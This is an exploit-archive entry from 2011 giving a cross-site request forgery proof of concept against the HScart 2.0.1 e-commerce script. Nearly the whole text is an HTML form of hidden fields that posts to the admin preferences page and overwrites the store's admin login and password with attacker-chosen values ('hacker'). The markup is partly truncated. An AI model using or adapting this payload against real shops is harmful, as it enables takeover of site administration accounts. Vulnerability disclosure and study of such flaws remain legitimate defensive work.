Home / exploits HScart 2.0.1 Cross Site Request Forgery
Posted on 03 August 2011
# Exploit Title: HScart v2.0 ~~>> XSRF Vuln. # Download : http://www.scriptlerim.net/dosya/hscart-v2.0.1.zip # Date: 01.05.2011 # Author: Err0r # Version: v2.0.1 # Note: Warning. The aim is not damaged. Information purposes --------------------------------------------- <title>BugResearchers</title> <form action=' http://cwerr0r.byethost7.com/admin.php?p=preferencesEdit&sOption=save' method='post' id='form' enctype='multipart/form-data' onsubmit='return checkForm( this, <input type='hidden' name='logo' class='input' size='30' /> <input type='hidden' name='title' value="HS.Cart - Simple e-commerce by HOMAMsoft.com" class='input' size='50'/> <input type='hidden' name='login' value="hacker" class='input' size='20' /> <input type='hidden' name='pass' value="hackerhackerhacker" class='input' size='20' /> <input type='hidden' name='email' value="email@email.com" class='input' size='35' /> <input type='hidden' value='save' style="height: 142px; width: 256px" /> ---------------------------------------------- ~~~>> ~~~>> ~~~>>
